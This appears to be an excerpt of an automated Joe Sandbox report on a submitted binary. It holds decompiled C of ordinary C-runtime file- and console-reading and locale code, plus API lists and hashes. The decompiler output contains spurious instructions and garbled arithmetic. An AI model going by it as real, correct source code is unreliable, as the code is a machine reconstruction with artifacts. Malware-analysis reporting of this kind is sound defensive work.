                						_t397 =  *((intOrPtr*)(0xecf230 + _t366 * 4));
                						_t370 =  *(_t432 - 0xc);
                						 *(_t432 - 0x1c) = _t261;
                						if(( *(_t397 + _t362 + 4) & 0x00000048) != 0) {
                							_t405 =  *((intOrPtr*)(_t397 + _t362 + 5));
                							if(_t405 != 0xa && _t421 != 0) {
                								 *_t261 = _t405;
                								_t406 = _t261 + 1;
                								_t409 = 1;
                								_t421 = _t421 - 1;
                								 *(_t432 - 0x1c) = _t406;
                								 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 5)) = 0xa;
                								if( *(_t432 + 0x13) != 0) {
                									_t353 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25));
                									if(_t353 != 0xa && _t421 != 0) {
                										 *_t406 = _t353;
                										_t407 = _t406 + 1;
                										_t421 = _t421 - 1;
                										 *(_t432 - 0x1c) = _t407;
                										_t409 = 2;
                										 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x25)) = 0xa;
                										if( *(_t432 + 0x13) == 1) {
                											_t356 =  *((intOrPtr*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26));
                											if(_t356 != 0xa && _t421 != 0) {
                												 *_t407 = _t356;
                												_t421 = _t421 - 1;
                												_t409 = 3;
                												_t395 = 0xa;
                												 *(_t432 - 0x1c) = _t407 + 1;
                												 *((char*)( *((intOrPtr*)(0xecf230 + _t370 * 4)) + _t362 + 0x26)) = _t395;
                											}
                										}
                									}
                								}
                							}
                						}
                						_t262 = E00EB3924( *((intOrPtr*)(_t432 + 8)));
                						_t263 =  *(_t432 - 0xc);
                						if(_t262 == 0) {
                							L35:
                							_t265 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t263 * 4)) + _t362),  *(_t432 - 0x1c), _t421, _t432 - 0x14, 0); // executed
                							__eflags = _t265;
                							if(_t265 == 0) {
                								L156:
                								_t266 = GetLastError();
                								_t423 = 5;
                								__eflags = _t266 - _t423;
                								if(_t266 != _t423) {
                									__eflags = _t266 - 0x6d;
                									if(_t266 != 0x6d) {
                										goto L30;
                									}
                									_t364 = 0;
                									goto L32;
                								}
                								 *((intOrPtr*)(E00EAF100())) = 9;
                								 *(E00EAF0CC()) = _t423;
                								goto L31;
                							}
                							_t375 =  *(_t432 - 0x14);
                							__eflags = _t375;
                							if(_t375 < 0) {
                								goto L156;
                							}
                							__eflags = _t375 - _t421;
                							if(_t375 > _t421) {
                								goto L156;
                							}
                							goto L38;
                						} else {
                							_t394 =  *((intOrPtr*)(0xecf230 + _t263 * 4));
                							if(( *(_t394 + _t362 + 4) & 0x00000080) == 0) {
                								goto L35;
                							}
                							_t345 = GetConsoleMode( *(_t394 + _t362), _t432 - 0x20);
                							 *(_t432 - 0x20) = _t345;
                							if(_t345 == 0 ||  *(_t432 + 0x13) != 2) {
                								_t263 =  *(_t432 - 0xc);
                								goto L35;
                							} else {
                								if(ReadConsoleW( *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362),  *(_t432 - 0x1c), _t421 >> 1, _t432 - 0x14, 0) != 0) {
                									_t375 =  *(_t432 - 0x14) +  *(_t432 - 0x14);
                									 *(_t432 - 0x14) = _t375;
                									L38:
                									_t398 =  *(_t432 - 0xc);
                									_t409 = _t409 + _t375;
                									_t424 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                									_t272 =  *(_t424 + _t362 + 4);
                									__eflags = _t272;
                									if(_t272 >= 0) {
                										L98:
                										_t172 = _t432 - 0x10; // 0xeb2b47
                										_t268 =  *_t172;
                										L99:
                										_t364 =  *(_t432 - 0x18);
                										L100:
                										if(_t268 !=  *(_t432 + 0xc)) {
                											E00EB2248(_t268);
                										}
                										if(_t364 != 0xfffffffe) {
                											_t409 = _t364;
                										}
                										_t258 = _t409;
                										L162:
                										return _t258;
                									}
                									__eflags =  *(_t432 + 0x13) - 2;
                									if( *(_t432 + 0x13) == 2) {
                										__eflags =  *(_t432 - 0x20);
                										if( *(_t432 - 0x20) == 0) {
                											__eflags = _t375;
                											if(_t375 == 0) {
                												L123:
                												_t273 = _t272 & 0x000000fb;
                												__eflags = _t273;
                												L124:
                												 *(_t424 + _t362 + 4) = _t273;
                												_t194 = _t432 - 0x10; // 0xeb2b47
                												_t274 =  *_t194;
                												_t425 = _t274;
                												 *(_t432 - 0x28) = _t274;
                												_t376 = _t274 + _t409;
                												 *(_t432 - 0x20) = _t376;
                												__eflags = _t274 - _t376;
                												if(_t274 >= _t376) {
                													L155:
                													_t246 = _t432 - 0x10; // 0xeb2b47
                													_t268 =  *_t246;
                													_t409 = _t425 - _t268;
                													goto L99;
                												}
                												_t377 = 0xd;
                												 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
                												_t412 = _t274;
                												while(1) {
                													_t275 =  *_t412 & 0x0000ffff;
                													__eflags = _t275 -  *((intOrPtr*)(_t432 + 0x10));
                													if(_t275 ==  *((intOrPtr*)(_t432 + 0x10))) {
                														break;
                													}
                													__eflags = _t275 - _t377;
                													if(_t275 == _t377) {
                														__eflags = _t412 -  *(_t432 - 0x20) + 0xfffffffe;
                														if(_t412 >=  *(_t432 - 0x20) + 0xfffffffe) {
                															_t412 =  &(_t412[1]);
                															_t284 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 8, 2, _t432 - 0x14, 0);
                															__eflags = _t284;
                															if(_t284 != 0) {
                																L136:
                																__eflags =  *(_t432 - 0x14);
                																if( *(_t432 - 0x14) == 0) {
                																	L151:
                																	_t398 =  *(_t432 - 0xc);
                																	_t377 = 0xd;
                																	 *_t425 = _t377;
                																	_t425 = _t425 + 2;
                																	L143:
                																	__eflags = _t412 -  *(_t432 - 0x20);
                																	if(_t412 <  *(_t432 - 0x20)) {
                																		continue;
                																	}
                																	goto L155;
                																}
                																_t398 =  *(_t432 - 0xc);
                																_t285 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                																__eflags =  *(_t285 + _t362 + 4) & 0x00000048;
                																if(( *(_t285 + _t362 + 4) & 0x00000048) == 0) {
                																	__eflags = _t425 -  *(_t432 - 0x10);
                																	if(__eflags != 0) {
                																		L148:
                																		E00EB3F56(_t377, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xfffffffe, 0xffffffff, 1);
                																		_t398 =  *(_t432 - 0xc);
                																		_t434 = _t434 + 0x10;
                																		_t287 = 0xa;
                																		__eflags =  *(_t432 - 8) - _t287;
                																		if( *(_t432 - 8) == _t287) {
                																			L141:
                																			_push(0xd);
                																			L142:
                																			_pop(_t377);
                																			goto L143;
                																		}
                																		_t377 = 0xd;
                																		 *_t425 = _t377;
                																		L150:
                																		_t425 = _t425 + 2;
                																		goto L143;
                																	}
                																	_t288 = 0xa;
                																	__eflags =  *(_t432 - 8) - _t288;
                																	if(__eflags != 0) {
                																		goto L148;
                																	}
                																	 *_t425 = _t288;
                																	_t425 = _t425 + 2;
                																	goto L141;
                																}
                																_t289 = 0xa;
                																_push(0xd);
                																__eflags =  *(_t432 - 8) - _t289;
                																if( *(_t432 - 8) != _t289) {
                																	_pop(_t290);
                																	 *_t425 = _t290;
                																	_t425 = _t425 + 2;
                																	__eflags = _t425;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 8);
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x25)) =  *((intOrPtr*)(_t432 - 7));
                																	_t381 = 0xa;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 0x26)) = _t381;
                																	goto L141;
                																}
                																 *_t425 = _t289;
                																_t425 = _t425 + 2;
                																goto L142;
                															}
                															_t294 = GetLastError();
                															__eflags = _t294;
                															if(_t294 != 0) {
                																goto L151;
                															}
                															goto L136;
                														}
                														_t399 = 0xa;
                														__eflags = _t412[1] - _t399;
                														_t398 =  *(_t432 - 0xc);
                														if(_t412[1] != _t399) {
                															 *_t425 = _t377;
                															L133:
                															_t425 = _t425 + 2;
                															_t412 =  &(_t412[1]);
                															goto L143;
                														}
                														_t295 = 0xa;
                														_t412 =  &(_t412[2]);
                														 *_t425 = _t295;
                														goto L150;
                													}
                													 *_t425 = _t275;
                													goto L133;
                												}
                												_t378 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                												_t276 =  *(_t378 + _t362 + 4);
                												__eflags = _t276 & 0x00000040;
                												if((_t276 & 0x00000040) != 0) {
                													 *_t425 =  *_t412;
                													_t425 = _t425 + 2;
                													__eflags = _t425;
                												} else {
                													 *(_t378 + _t362 + 4) = _t276 | 0x00000002;
                												}
                												goto L155;
                											}
                											_t190 = _t432 - 0x10; // 0xeb2b47
                											_t400 = 0xa;
                											__eflags =  *((intOrPtr*)( *_t190)) - _t400;
                											_t398 =  *(_t432 - 0xc);
                											if( *((intOrPtr*)( *_t190)) != _t400) {
                												goto L123;
                											}
                											_t273 = _t272 | 0x00000004;
                											goto L124;
                										}
                										_t176 = _t432 - 0x10; // 0xeb2b47
                										_t426 =  *_t176;
                										asm("cdq");
                										_t413 = _t426;
                										_t383 = _t426;
                										_t401 = _t413 + (_t409 - _t398 >> 1) * 2;
                										__eflags = _t413 - _t401;
                										asm("cli");
                										if(__eflags >= 0) {
                											L119:
                											_t189 = _t432 - 0x10; // 0xeb2b47
                											_t268 =  *_t189;
                											_t409 = _t426 - _t268 & 0xfffffffe;
                											goto L99;
                										} else {
                											 *((intOrPtr*)(_t432 + 0x10)) = 0x1a;
                											_t416 = 0xd;
                											while(1) {
                												_t299 =  *_t383 & 0x0000ffff;
                												__eflags = _t299 -  *((intOrPtr*)(_t432 + 0x10));
                												if(_t299 ==  *((intOrPtr*)(_t432 + 0x10))) {
                													break;
                												}
                												__eflags = _t299 - _t416;
                												if(_t299 == _t416) {
                													__eflags = _t383 - _t401 - 2;
                													if(_t383 < _t401 - 2) {
                														_t383 = _t383 + 2;
                														_t303 = 0xa;
                														__eflags =  *_t383 - _t303;
                														if( *_t383 != _t303) {
                															_t303 = 0xd;
                															_t416 = _t303;
                														}
                														 *_t426 = _t303;
                														_t426 = _t426 + 2;
                														__eflags = _t426;
                													}
                												} else {
                													 *_t426 = _t299;
                													_t426 = _t426 + 2;
                													_t383 = _t383 + 2;
                												}
                												__eflags = _t383 - _t401;
                												if(_t383 < _t401) {
                													continue;
                												} else {
                													goto L119;
                												}
                											}
                											_t301 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
                											_t185 = _t301 + _t362 + 4;
                											 *_t185 =  *(_t301 + _t362 + 4) | 0x00000002;
                											__eflags =  *_t185;
                											goto L119;
                										}
                									}
                									__eflags = _t375;
                									if(_t375 == 0) {
                										L43:
                										_t304 = _t272 & 0x000000fb;
                										__eflags = _t304;
                										L44:
                										 *(_t424 + _t362 + 4) = _t304;
                										_t95 = _t432 - 0x10; // 0xeb2b47
                										_t305 =  *_t95;
                										_t427 = _t305;
                										 *(_t432 - 0x20) = _t305;
                										_t384 = _t305 + _t409;
                										 *(_t432 - 0x1c) = _t384;
                										__eflags = _t305 - _t384;
                										if(_t305 >= _t384) {
                											L74:
                											_t135 = _t432 - 0x10; // 0xeb2b47
                											_t268 =  *_t135;
                											_t409 = _t427 - _t268;
                											__eflags =  *(_t432 + 0x13) - 1;
                											if( *(_t432 + 0x13) != 1) {
                												goto L99;
                											}
                											__eflags = _t409;
                											if(_t409 == 0) {
                												goto L99;
                											}
                											_t428 = _t427 - 1;
                											_t306 =  *_t428;
                											__eflags = _t306;
                											if(_t306 < 0) {
                												_t307 = _t306 & 0x000000ff;
                												_t403 = 1;
                												__eflags =  *((char*)(_t307 + 0xece408));
                												if( *((char*)(_t307 + 0xece408)) != 0) {
                													L84:
                													_t309 =  *((char*)(( *_t428 & 0x000000ff) + 0xece408));
                													__eflags = _t309;
                													if(_t309 != 0) {
                														__eflags = _t309 + 1 - _t403;
                														if(_t309 + 1 != _t403) {
                															_t385 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
                															__eflags =  *(_t385 + _t362 + 4) & 0x00000048;
                															if(__eflags == 0) {
                																asm("cdq");
                																E00EB3F56(_t385, __eflags,  *((intOrPtr*)(_t432 + 8)),  ~_t403,  ~_t403, 1);
                																_t434 = _t434 + 0x10;
                															} else {
                																_t430 =  &(_t428[1]);
                																 *((char*)(_t385 + _t362 + 5)) =  *_t428;
                																_t320 =  *(_t432 - 0xc);
                																__eflags = _t403 - 2;
                																if(_t403 >= 2) {
                																	_t322 =  *_t430;
                																	_t430 = _t430 + 1;
                																	__eflags = _t430;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x25)) = _t322;
                																	_t320 =  *(_t432 - 0xc);
                																}
                																__eflags = _t403 - 3;
                																if(_t403 == 3) {
                																	_t321 =  *_t430;
                																	_t430 = _t430 + 1;
                																	__eflags = _t430;
                																	 *((char*)( *((intOrPtr*)(0xecf230 + _t320 * 4)) + _t362 + 0x26)) = _t321;
                																}
                																_t428 = _t430 - _t403;
                															}
                														} else {
                															_t428 =  &(_t428[_t403]);
                														}
                														L95:
                														_t163 = _t432 - 0x10; // 0xeb2b47
                														_t418 =  *_t163;
                														_t429 = _t428 - _t418;
                														_t409 = MultiByteToWideChar(0xfde9, 0, _t418, _t429,  *(_t432 + 0xc),  *(_t432 - 0x28) >> 1);
                														__eflags = _t409;
                														if(_t409 == 0) {
                															goto L29;
                														}
                														__eflags = _t409 - _t429;
                														_t387 = 0 | _t409 != _t429;
                														_t409 = _t409 + _t409;
                														__eflags = _t409;
                														 *( *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4)) + _t362 + 0x30) = _t387;
                														asm("sbb [eax], dh");
                														goto L98;
                													}
                													 *((intOrPtr*)(E00EAF100())) = 0x2a;
                													L31:
                													_t364 = _t362 | 0xffffffff;
                													L32:
                													_t75 = _t432 - 0x10; // 0xeb2b47
                													_t268 =  *_t75;
                													goto L100;
                												}
                												_t138 = _t432 - 0x10; // 0xeb2b47
                												_t365 =  *_t138;
                												while(1) {
                													__eflags = _t403 - 4;
                													if(_t403 > 4) {
                														break;
                													}
                													__eflags = _t428 - _t365;
                													if(_t428 < _t365) {
                														break;
                													}
                													_t428 = _t428 - 1;
                													_t403 = _t403 + 1;
                													_t324 =  *_t428 & 0x000000ff;
                													__eflags =  *((char*)(_t324 + 0xece408));
                													if( *((char*)(_t324 + 0xece408)) == 0) {
                														continue;
                													}
                													break;
                												}
                												_t362 =  *(_t432 - 0x24);
                												goto L84;
                											}
                											_t428 =  &(_t428[1]);
                											goto L95;
                										}
                										_t390 = 0xd;
                										_t419 = _t305;
                										while(1) {
                											_t325 =  *_t419;
                											__eflags = _t325 - 0x1a;
                											if(_t325 == 0x1a) {
                												break;
                											}
                											__eflags = _t325 - _t390;
                											if(_t325 == _t390) {
                												__eflags = _t419 -  *(_t432 - 0x1c) - 1;
                												if(_t419 >=  *(_t432 - 0x1c) - 1) {
                													_t419 = _t419 + 1;
                													_t334 = ReadFile( *( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362), _t432 - 1, 1, _t432 - 0x14, 0);
                													__eflags = _t334;
                													if(_t334 != 0) {
                														L55:
                														__eflags =  *(_t432 - 0x14);
                														if( *(_t432 - 0x14) == 0) {
                															L70:
                															_t398 =  *(_t432 - 0xc);
                															_t390 = 0xd;
                															 *_t427 = _t390;
                															_t427 = _t427 + 1;
                															L65:
                															__eflags = _t419 -  *(_t432 - 0x1c);
                															if(_t419 <  *(_t432 - 0x1c)) {
                																continue;
                															}
                															goto L74;
                														}
                														_t398 =  *(_t432 - 0xc);
                														_t335 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                														__eflags =  *(_t335 + _t362 + 4) & 0x00000048;
                														if(( *(_t335 + _t362 + 4) & 0x00000048) == 0) {
                															_t120 = _t432 - 0x10; // 0xeb2b47
                															__eflags = _t427 -  *_t120;
                															if(__eflags != 0) {
                																L67:
                																E00EB3F56(_t390, __eflags,  *((intOrPtr*)(_t432 + 8)), 0xffffffff, 0xffffffff, 1);
                																_t398 =  *(_t432 - 0xc);
                																_t434 = _t434 + 0x10;
                																_t337 = 0xa;
                																__eflags =  *(_t432 - 1) - _t337;
                																if( *(_t432 - 1) == _t337) {
                																	L63:
                																	_push(0xd);
                																	L64:
                																	_pop(_t390);
                																	goto L65;
                																}
                																_t390 = 0xd;
                																 *_t427 = _t390;
                																L69:
                																_t427 = _t427 + 1;
                																goto L65;
                															}
                															_t338 = 0xa;
                															__eflags =  *(_t432 - 1) - _t338;
                															if(__eflags != 0) {
                																goto L67;
                															}
                															 *_t427 = _t338;
                															_t427 = _t427 + 1;
                															__eflags = _t427;
                															goto L63;
                														}
                														_t339 = 0xa;
                														_push(0xd);
                														__eflags =  *(_t432 - 1) - _t339;
                														if( *(_t432 - 1) != _t339) {
                															 *_t427 = 0xd;
                															_t427 = _t427 + 1;
                															 *((char*)( *((intOrPtr*)(0xecf230 + _t398 * 4)) + _t362 + 5)) =  *(_t432 - 1);
                														} else {
                															 *_t427 = _t339;
                															_t427 = _t427 + 1;
                														}
                														goto L64;
                													}
                													_t341 = GetLastError();
                													__eflags = _t341;
                													if(_t341 != 0) {
                														goto L70;
                													}
                													goto L55;
                												}
                												_t342 = _t419 + 1;
                												__eflags =  *_t342 - 0xa;
                												if( *_t342 != 0xa) {
                													 *_t427 = _t390;
                													_t419 = _t342;
                													_t427 = _t427 + 1;
                													goto L65;
                												}
                												_t343 = 0xa;
                												_t419 = _t419 + 2;
                												 *_t427 = _t343;
                												goto L69;
                											}
                											 *_t427 = _t325;
                											_t427 = _t427 + 1;
                											_t419 = _t419 + 1;
                											goto L65;
                										}
                										_t391 =  *((intOrPtr*)(0xecf230 + _t398 * 4));
                										_t326 =  *(_t391 + _t362 + 4);
                										__eflags = _t326 & 0x00000040;
                										if((_t326 & 0x00000040) != 0) {
                											 *_t427 =  *_t419;
                											_t427 = _t427 + 1;
                											__eflags = _t427;
                										} else {
                											 *(_t391 + _t362 + 4) = _t326 | 0x00000002;
                										}
                										goto L74;
                									}
                									_t92 = _t432 - 0x10; // 0xeb2b47
                									__eflags =  *((char*)( *_t92)) - 0xa;
                									if( *((char*)( *_t92)) != 0xa) {
                										goto L43;
                									}
                									_t304 = _t272 | 0x00000004;
                									goto L44;
                								}
                								L29:
                								_t266 = GetLastError();
                								L30:
                								E00EAF0DF(_t266);
                								goto L31;
                							}
                						}
                					}
                					if(( !__esi & 0x00000001) == 0) {
                						L2:
                						 *(E00EAF0CC()) =  *_t255 & _t409;
                						 *((intOrPtr*)(E00EAF100())) = 0x16;
                						_t257 = E00EAEB1E();
                						L161:
                						_t258 = _t257 | 0xffffffff;
                						__eflags = _t258;
                						goto L162;
                					} else {
                						_t421 = __esi & 0xfffffffe;
                						goto L7;
                					}
                				}
                			}




































































































                0x00eafe35
                0x00eaff56
                0x00eaff5d
                0x00eaff61
                0x00eaff63
                0x00eaff70
                0x00eaff73
                0x00eaff73
                0x00eaff65
                0x00eaff67
                0x00eaff67
                0x00000000
                0x00eaff63
                0x00eafde9
                0x00eafdee
                0x00eafdef
                0x00eafdf2
                0x00eafdf5
                0x00000000
                0x00000000
                0x00eafdf7
                0x00000000
                0x00eafdf7
                0x00eafd6c
                0x00eafd6c
                0x00eafd71
                0x00eafd72
                0x00eafd76
                0x00eafd7a
                0x00eafd7d
                0x00eafd7e
                0x00eafd7f
                0x00eafdd6
                0x00eafdd6
                0x00eafdd6
                0x00eafddd
                0x00000000
                0x00eafd81
                0x00eafd83
                0x00eafd8a
                0x00eafd8b
                0x00eafd8b
                0x00eafd8e
                0x00eafd92
                0x00000000
                0x00000000
                0x00eafd94
                0x00eafd97
                0x00eafda7
                0x00eafda9
                0x00eafdab
                0x00eafdb0
                0x00eafdb1
                0x00eafdb4
                0x00eafdb8
                0x00eafdba
                0x00eafdba
                0x00eafdbb
                0x00eafdbe
                0x00eafdbe
                0x00eafdbe
                0x00eafd99
                0x00eafd99
                0x00eafd9c
                0x00eafd9f
                0x00eafd9f
                0x00eafdc1
                0x00eafdc3
                0x00000000
                0x00eafdc5
                0x00000000
                0x00eafdc5
                0x00eafdc3
                0x00eafdca
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00000000
                0x00eafdd1
                0x00eafd7f
                0x00eafaf9
                0x00eafafb
                0x00eafb09
                0x00eafb09
                0x00eafb09
                0x00eafb0b
                0x00eafb0b
                0x00eafb0f
                0x00eafb0f
                0x00eafb12
                0x00eafb14
                0x00eafb17
                0x00eafb1a
                0x00eafb1d
                0x00eafb1f
                0x00eafc33
                0x00eafc33
                0x00eafc33
                0x00eafc38
                0x00eafc3a
                0x00eafc3e
                0x00000000
                0x00000000
                0x00eafc44
                0x00eafc46
                0x00000000
                0x00000000
                0x00eafc4c
                0x00eafc4d
                0x00eafc4f
                0x00eafc51
                0x00eafc59
                0x00eafc5e
                0x00eafc5f
                0x00eafc66
                0x00eafc85
                0x00eafc88
                0x00eafc8f
                0x00eafc91
                0x00eafca4
                0x00eafca6
                0x00eafcaf
                0x00eafcb6
                0x00eafcbb
                0x00eafcfa
                0x00eafd00
                0x00eafd05
                0x00eafcbd
                0x00eafcbf
                0x00eafcc0
                0x00eafcc4
                0x00eafcc7
                0x00eafcca
                0x00eafcd3
                0x00eafcd5
                0x00eafcd5
                0x00eafcd6
                0x00eafcda
                0x00eafcda
                0x00eafcdd
                0x00eafce0
                0x00eafce9
                0x00eafceb
                0x00eafceb
                0x00eafcec
                0x00eafcec
                0x00eafcf0
                0x00eafcf0
                0x00eafca8
                0x00eafca8
                0x00eafca8
                0x00eafd08
                0x00eafd0b
                0x00eafd0b
                0x00eafd0e
                0x00eafd25
                0x00eafd27
                0x00eafd29
                0x00000000
                0x00000000
                0x00eafd34
                0x00eafd36
                0x00eafd39
                0x00eafd39
                0x00eafd42
                0x00eafd44
                0x00000000
                0x00eafd44
                0x00eafc98
                0x00eafa89
                0x00eafa89
                0x00eafa8c
                0x00eafa8c
                0x00eafa8c
                0x00000000
                0x00eafa8c
                0x00eafc68
                0x00eafc68
                0x00eafc6b
                0x00eafc6b
                0x00eafc6e
                0x00000000
                0x00000000
                0x00eafc70
                0x00eafc72
                0x00000000
                0x00000000
                0x00eafc74
                0x00eafc75
                0x00eafc76
                0x00eafc79
                0x00eafc80
                0x00000000
                0x00000000
                0x00000000
                0x00eafc80
                0x00eafc82
                0x00000000
                0x00eafc82
                0x00eafc53
                0x00000000
                0x00eafc53
                0x00eafb27
                0x00eafb28
                0x00eafb2a
                0x00eafb2a
                0x00eafb2c
                0x00eafb2e
                0x00000000
                0x00000000
                0x00eafb34
                0x00eafb36
                0x00eafb45
                0x00eafb47
                0x00eafb6a
                0x00eafb7c
                0x00eafb82
                0x00eafb84
                0x00eafb90
                0x00eafb90
                0x00eafb94
                0x00eafc0c
                0x00eafc0c
                0x00eafc11
                0x00eafc12
                0x00eafc14
                0x00eafbdd
                0x00eafbdd
                0x00eafbe0
                0x00000000
                0x00000000
                0x00000000
                0x00eafbe6
                0x00eafb96
                0x00eafb99
                0x00eafba0
                0x00eafba5
                0x00eafbca
                0x00eafbca
                0x00eafbcd
                0x00eafbe8
                0x00eafbf1
                0x00eafbf6
                0x00eafbf9
                0x00eafbfe
                0x00eafbff
                0x00eafc02
                0x00eafbda
                0x00eafbda
                0x00eafbdc
                0x00eafbdc
                0x00000000
                0x00eafbdc
                0x00eafc06
                0x00eafc07
                0x00eafc09
                0x00eafc09
                0x00000000
                0x00eafc09
                0x00eafbd1
                0x00eafbd2
                0x00eafbd5
                0x00000000
                0x00000000
                0x00eafbd7
                0x00eafbd9
                0x00eafbd9
                0x00000000
                0x00eafbd9
                0x00eafba9
                0x00eafbaa
                0x00eafbac
                0x00eafbaf
                0x00eafbb6
                0x00eafbb9
                0x00eafbc4
                0x00eafbb1
                0x00eafbb1
                0x00eafbb3
                0x00eafbb3
                0x00000000
                0x00eafbaf
                0x00eafb86
                0x00eafb8c
                0x00eafb8e
                0x00000000
                0x00000000
                0x00000000
                0x00eafb8e
                0x00eafb49
                0x00eafb4c
                0x00eafb4f
                0x00eafb5e
                0x00eafb60
                0x00eafb62
                0x00000000
                0x00eafb62
                0x00eafb53
                0x00eafb54
                0x00eafb57
                0x00000000
                0x00eafb57
                0x00eafb38
                0x00eafb3a
                0x00eafb3b
                0x00000000
                0x00eafb3b
                0x00eafc17
                0x00eafc1e
                0x00eafc22
                0x00eafc24
                0x00eafc30
                0x00eafc32
                0x00eafc32
                0x00eafc26
                0x00eafc28
                0x00eafc28
                0x00000000
                0x00eafc24
                0x00eafafd
                0x00eafb00
                0x00eafb03
                0x00000000
                0x00000000
                0x00eafb05
                0x00000000
                0x00eafb05
                0x00eafa7c
                0x00eafa7c
                0x00eafa82
                0x00eafa83
                0x00000000
                0x00eafa88
                0x00eafa51
                0x00eafa2f
                0x00eaf913
                0x00eaf8f0
                0x00eaf8f5
                0x00eaf8d0
                0x00eaffcc
                0x00eaffd1
                0x00eaffd1
                0x00eaffd1
                0x00000000
                0x00eaf915
                0x00eaf915
                0x00000000
                0x00eaf915
                0x00eaf913

                APIs
                • __malloc_crt.LIBCMT ref: 00EAF933
                • GetConsoleMode.KERNEL32(00000080,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFA46
                • ReadConsoleW.KERNEL32(?,?,G+,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFA72
                • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?), ref: 00EAFA7C
                • __dosmaperr.LIBCMT ref: 00EAFA83
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                • String ID: G+$G+
                • API String ID: 3470617983-4250722411
                • Opcode ID: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction ID: 8ad9a3cb26877d49196f97b2105841c718f8084deb61371a1af45866c828a03a
                • Opcode Fuzzy Hash: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction Fuzzy Hash: 8C41F870E146858ECB26CF9D9C84BE9BBE1AF0B308F055175E858AF2B2C631DD0AC750
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00EA5641(void* __eax, intOrPtr __ebx, short __ecx, void* __edx, signed int __edi, signed int* __esi, void* __eflags) {
                				void* _t39;
                				signed int _t40;
                				signed int _t43;
                				void* _t46;
                				signed int _t48;
                				intOrPtr* _t52;
                				signed int _t60;
                				signed short _t61;
                				signed int _t63;
                				signed int _t64;
                				signed int _t65;
                				signed int _t67;
                				intOrPtr _t70;
                				signed int _t72;
                				void* _t79;
                				void* _t81;
                				void* _t93;
                				intOrPtr* _t96;
                				void* _t97;
                				signed int _t98;
                				void* _t100;
                				void* _t101;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                				void* _t107;
                
                				_t95 = __esi;
                				_t92 = __edi;
                				_t91 = __edx;
                				_t82 = __ecx;
                				_t80 = __ebx;
                				asm("adc eax, [ecx+0x682af3]");
                				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
                				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
                				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
                				_push(__eax);
                				_push(__edi);
                				_push(__eax);
                				if(__eflags == 0) {
                					_t39 = E00EBE1D4(__ecx, __edx);
                				} else {
                					_t39 = E00EBEA44(__edx);
                				}
                				_t101 = _t100 + 0xc;
                				if(_t39 == 0) {
                					_t40 = E00EBA06A(_t95);
                					_pop(_t82);
                					__eflags = _t40;
                					if(_t40 == 0) {
                						_t43 = E00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t80, E00EB5609(_t80) + 1);
                						__eflags = _t43;
                						if(_t43 != 0) {
                							goto L30;
                						} else {
                							__eflags = 0;
                							goto L2;
                						}
                					} else {
                						_t60 = E00EB9FDB(_t95, 0x20001004, _t98 - 0x1dc, 2);
                						_t104 = _t101 + 0x10;
                						__eflags = _t60;
                						if(_t60 == 0) {
                							L13:
                							_t61 = GetACP();
                							 *(_t98 - 0x1dc) = _t61;
                						} else {
                							_t61 =  *(_t98 - 0x1dc);
                							__eflags = _t61;
                							if(_t61 == 0) {
                								goto L13;
                							}
                						}
                						 *_t92 = _t61 & 0x0000ffff;
                						_t92 =  *((intOrPtr*)(_t98 - 0x1e4)) + 1;
                						_t63 = E00EB5727( *((intOrPtr*)(_t98 - 0x1d4)), 0x83, _t95,  *((intOrPtr*)(_t98 - 0x1e4)) + 1);
                						_t105 = _t104 + 0x10;
                						__eflags = _t63;
